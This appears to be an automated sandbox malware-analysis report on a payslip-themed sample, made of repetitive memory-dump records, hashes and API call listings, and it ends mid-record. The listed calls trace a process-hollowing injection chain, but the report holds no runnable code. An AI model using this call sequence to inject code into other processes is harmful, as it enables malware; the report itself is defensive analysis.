                                              • Source File: 00000003.00000002.4514513928.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6840000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a743f3f956224923a74ce3ae2f0da61d9979f746354a829506384cac712e5f7e
                                              • Instruction ID: 5aea5af67e31086da42b2ce668db6a5f2b2859911c816b8b9abc983a1f1034fb
                                              • Opcode Fuzzy Hash: a743f3f956224923a74ce3ae2f0da61d9979f746354a829506384cac712e5f7e

                                              Execution Graph

                                              Execution Coverage:8.9%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:247
                                              Total number of Limit Nodes:11

                                              Control-flow Graph

                                              APIs
                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0B3C9D4E
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2169905450.000000000B3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B3C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_b3c0000_sgxIb.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0

                                              Control-flow Graph

                                              APIs
                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0B3C9D4E
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2169905450.000000000B3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B3C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_b3c0000_sgxIb.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0

                                              Control-flow Graph

                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0167B176
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2165773127.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_1670000_sgxIb.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0

                                              Control-flow Graph

                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 016759C9
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2165773127.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_1670000_sgxIb.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0

                                              Control-flow Graph

                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 016759C9
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2165773127.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_1670000_sgxIb.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0

                                              APIs
                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0B3C94E8
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2169905450.000000000B3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B3C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_b3c0000_sgxIb.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0

                                              APIs
                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0B3C9A00
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2169905450.000000000B3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B3C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_b3c0000_sgxIb.jbxd
                                              Similarity
                                              • API ID: MemoryProcessRead
                                              • String ID:
                                              • API String ID: 1726664587-0

                                              APIs
                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0B3C94E8
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2169905450.000000000B3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B3C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_b3c0000_sgxIb.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0

                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0B3C933E
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2169905450.000000000B3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B3C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_b3c0000_sgxIb.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0

                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0167D4E6,?,?,?,?,?), ref: 0167D5A7
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2165773127.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_1670000_sgxIb.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0

                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0167D4E6,?,?,?,?,?), ref: 0167D5A7
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2165773127.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_1670000_sgxIb.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0

                                              APIs
                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0B3C9A00
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2169905450.000000000B3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B3C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_b3c0000_sgxIb.jbxd
                                              Similarity
                                              • API ID: MemoryProcessRead
                                              • String ID:
                                              • API String ID: 1726664587-0

                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0B3C933E
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2169905450.000000000B3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B3C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_b3c0000_sgxIb.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              APIs
                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0B3C9406
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2169905450.000000000B3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B3C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_b3c0000_sgxIb.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              APIs
                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0B3C9406
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2169905450.000000000B3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B3C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_b3c0000_sgxIb.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2169905450.000000000B3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B3C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_b3c0000_sgxIb.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2169905450.000000000B3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B3C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_b3c0000_sgxIb.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 0B3CC23D
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2169905450.000000000B3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B3C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_b3c0000_sgxIb.jbxd
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 0B3CC23D
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2169905450.000000000B3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B3C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_b3c0000_sgxIb.jbxd
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0167B176
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2165773127.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_1670000_sgxIb.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: eb56e8eec71a74f56046d167b4211cfd5d7192530c5cd80b06a706651b2c3352
                                              • Instruction ID: 54ea56a6c3423d327b8484454c5d702707e542740f9dc14d2e5c5b213cf68f54
                                              • Opcode Fuzzy Hash: eb56e8eec71a74f56046d167b4211cfd5d7192530c5cd80b06a706651b2c3352
                                              • Instruction Fuzzy Hash: 7D110FB5C002498FDB10DF9AD848A9EFBF4EF89220F10841AD528A7610C379A545CFA1
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2165510160.00000000015DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015DD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_15dd000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9c3a356834ad09ec48a6a2bf826bc19e753968c32d228172cd179b2bf8e56e1d
                                              • Instruction ID: 15efcdbc500f0fd8a252c31b2335f97737ea770cc4b3dd11ee4ef7816ef5cdac
                                              • Opcode Fuzzy Hash: 9c3a356834ad09ec48a6a2bf826bc19e753968c32d228172cd179b2bf8e56e1d
                                              • Instruction Fuzzy Hash: 2F21F471500204DFDB25DF98D9C0B6ABFB5FB98324F20C569D9090F296C37AE456C7A2
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2165556348.00000000015ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 015ED000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_15ed000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6a8bcc0087f6c7d3b841ac30bf9130555293e82d713972688a03a6ed311ef93a
                                              • Instruction ID: 9a2d74957c761628659781f076ceb19499310a31590e1f24736e4fb7dc0243df
                                              • Opcode Fuzzy Hash: 6a8bcc0087f6c7d3b841ac30bf9130555293e82d713972688a03a6ed311ef93a
                                              • Instruction Fuzzy Hash: 9A210071A04204DFCB19DF68D988B26BFF5FB88314F28C969D90A0F256D33AD406CA61
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2165556348.00000000015ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 015ED000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_15ed000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f5bba7037e635fd7875e89c1c6d78e7ccb11775886c0062459c3b756efff61f2
                                              • Instruction ID: b2e3e94ff4e53a860adca8b1ecd16734c3ffb92c9bade9fa545c5a7d44a15f85
                                              • Opcode Fuzzy Hash: f5bba7037e635fd7875e89c1c6d78e7ccb11775886c0062459c3b756efff61f2
                                              • Instruction Fuzzy Hash: 1221F575904204DFDB09DFA8D5C8B2ABBF5FB84324F20C9ADD9494F296C33AD406CA61
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2165556348.00000000015ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 015ED000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_15ed000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6b3cc5269bec8a96fccac150a2e4a9ff70860651b73e2ed129a47ba98cfe5d01
                                              • Instruction ID: 254dfb741344112e61d0293b62c98a75742c827e83a9347fc92e8032bd78b848
                                              • Opcode Fuzzy Hash: 6b3cc5269bec8a96fccac150a2e4a9ff70860651b73e2ed129a47ba98cfe5d01
                                              • Instruction Fuzzy Hash: 4B219F755093808FDB07CF24D994715BFB1FB46214F28C5EAD8498F2A7C33A980ACB62
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2165510160.00000000015DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015DD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_15dd000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                              • Instruction ID: 2faebf6734f86c35b78dc3e2b129717a42b75b673c013950b8719bd63df373f1
                                              • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                              • Instruction Fuzzy Hash: B711CD72404240DFDB12CF48D5C4B5ABF71FB84224F24C6A9D9090A256C33AE45ACBA2
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2165556348.00000000015ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 015ED000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_15ed000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                              • Instruction ID: ec03755c698f5b3f5cf45dc61c9b821d85aa85167cf91281ecf00b551ca79186
                                              • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                              • Instruction Fuzzy Hash: E811BB75904280DFDB06CF54C5C8B19BFB1FB84224F24C6A9D8494F296C33AD40ACB62
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2165510160.00000000015DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015DD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_15dd000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2165510160.00000000015DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015DD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_15dd000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:

                                              Execution Graph

                                              Execution Coverage:11.5%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:17
                                              Total number of Limit Nodes:4
                                              [Execution graph 24467: edge list omitted; the nodes at 6bdfcc9 call GlobalMemoryStatusEx]

                                              Control-flow Graph

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                              • API String ID: 0-3723351465

                                              Control-flow Graph

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $]q$$]q
                                              • API String ID: 0-127220927

                                              Control-flow Graph

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $
                                              • API String ID: 0-3993045852
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:

                                              Control-flow Graph

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                              • API String ID: 0-1273862796

                                              Control-flow Graph

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $]q$$]q$$]q$$]q
                                              • API String ID: 0-858218434

                                              Control-flow Graph

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $]q$$]q$$]q
                                              • API String ID: 0-182748909

                                              Control-flow Graph

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: fbq$XPbq$\Obq
                                              • API String ID: 0-4057264190

                                              Control-flow Graph

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $]q$$]q
                                              • API String ID: 0-127220927
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: fbq$XPbq
                                              • API String ID: 0-2292610095

                                              Control-flow Graph
                                              • Graph image not preserved; the dumped node list starts at 2ceed70 and labels block 2ceee3f-2ceeecc GlobalMemoryStatusEx.
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2252684836.0000000002CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_2ce0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              APIs
                                              • GlobalMemoryStatusEx.KERNELBASE ref: 02CEEEBF
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2252684836.0000000002CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_2ce0000_sgxIb.jbxd
                                              Similarity
                                              • API ID: GlobalMemoryStatus
                                              • String ID:
                                              • API String ID: 1890195054-0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: PH]q
                                              • API String ID: 0-3168235125
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: PH]q
                                              • API String ID: 0-3168235125
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $]q
                                              • API String ID: 0-1007455737
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: \Obq
                                              • API String ID: 0-2878401908
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2637955563d37947d28a8c6dd64a04e41b8c732938956e30ae5c81ce61712a62
                                              • Instruction ID: 08c991d775f43e3a886a96c59cefcc719efea16cf53a79f40bf6702b0a0f1552
                                              • Opcode Fuzzy Hash: 2637955563d37947d28a8c6dd64a04e41b8c732938956e30ae5c81ce61712a62
                                              • Instruction Fuzzy Hash: 9B218CB5F002199FDB50DF69D990AAEBBF5EB48310F108066E905EB384E775D9018BA1
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 74e051beb0ab4c5cb1e563185e296c659c7ea5bf478c4bdf7578d9964a230117
                                              • Instruction ID: f158865e62758412abf0b3048c96b820269d8257e9e97ec8a57cefa7c11e313b
                                              • Opcode Fuzzy Hash: 74e051beb0ab4c5cb1e563185e296c659c7ea5bf478c4bdf7578d9964a230117
                                              • Instruction Fuzzy Hash: 1B216FB1D1071E8BDF64CFA9C84069EBBB5FF85354F11896AD809EF250EBB09845CB81
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4cd1bfb75401896c8254bda8503cc6ceddea0d43f194aa751a5bfe95580476dd
                                              • Instruction ID: 2e99c52ec33d033c0f8069602a7f52af762c6026678d56c8cea294fb2253952c
                                              • Opcode Fuzzy Hash: 4cd1bfb75401896c8254bda8503cc6ceddea0d43f194aa751a5bfe95580476dd
                                              • Instruction Fuzzy Hash: BE2138B1F001114FCBA5DA7CE85476E77E5EB86718F1044BAE50ECB395EE24CD068781
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f6e159d1ef3f30bb1b40dd4f86359c1cf03e8fd40e28a6da3d9faffd4d7a8d35
                                              • Instruction ID: a022b19c711b0900848cfbd9b8eecf00e5e5e0aba10411e7bb29229937c8a269
                                              • Opcode Fuzzy Hash: f6e159d1ef3f30bb1b40dd4f86359c1cf03e8fd40e28a6da3d9faffd4d7a8d35
                                              • Instruction Fuzzy Hash: 1A21DC70B200199BCF84EA69E8646AEB7B6EB84314F108579D409EB344EB30ED428B81
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 52db7d40affb63273d24fa2f32a41d67991bb1ff4088b55be810e5d297cdb867
                                              • Instruction ID: 8d9e330d739d173cd86f225da2e21a7b88ee39a8336e86f107dfa640a60b3bb9
                                              • Opcode Fuzzy Hash: 52db7d40affb63273d24fa2f32a41d67991bb1ff4088b55be810e5d297cdb867
                                              • Instruction Fuzzy Hash: D00122B5B101110BCB659A3CD81472EB7EADBC6620F10847AE14ECB3A5E960CC024391
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8681db92fd4840887cdc86895d5daad9ae7e41200049c243f962894b5d333b6a
                                              • Instruction ID: bd0ac6ae940eeef7cf473812dbe3dc050f4df1f389797c6354a1774b5f3669d5
                                              • Opcode Fuzzy Hash: 8681db92fd4840887cdc86895d5daad9ae7e41200049c243f962894b5d333b6a
                                              • Instruction Fuzzy Hash: 8C118E36B001284BDB54E668DC146AE77FAEBC8210F058579C50AEB340EE75DC068BE1
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: adc108c0fac19fee6e5a019e2d32e36deef034fb5c6fccba319dd876adc4f50f
                                              • Instruction ID: 4b9a9afa9e843ffa196f2566267e037b209359c5ed37621c1c95283d1ad4fb96
                                              • Opcode Fuzzy Hash: adc108c0fac19fee6e5a019e2d32e36deef034fb5c6fccba319dd876adc4f50f
                                              • Instruction Fuzzy Hash: 5201DF32F000295BDF94A668DC10AEF77FAEBC8210F014035D50AEB244EE759C074BE1
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2261541830.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6bd0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0f925b2247bdbffbf8b725692d1ccd64c64d759750d1c165b434080f1357d0cd
                                              • Instruction ID: e76b6e5dda9ea2ee816aa7b598509f350a5f739b9500f55af01f2fcbe738c5ce
                                              • Opcode Fuzzy Hash: 0f925b2247bdbffbf8b725692d1ccd64c64d759750d1c165b434080f1357d0cd
                                              • Instruction Fuzzy Hash: 3421C0B5D01219AFCB10DF9AD984ADEFFB8FB49310F10812AE918A7241D374A954CBA5
                                              Memory Dump Source
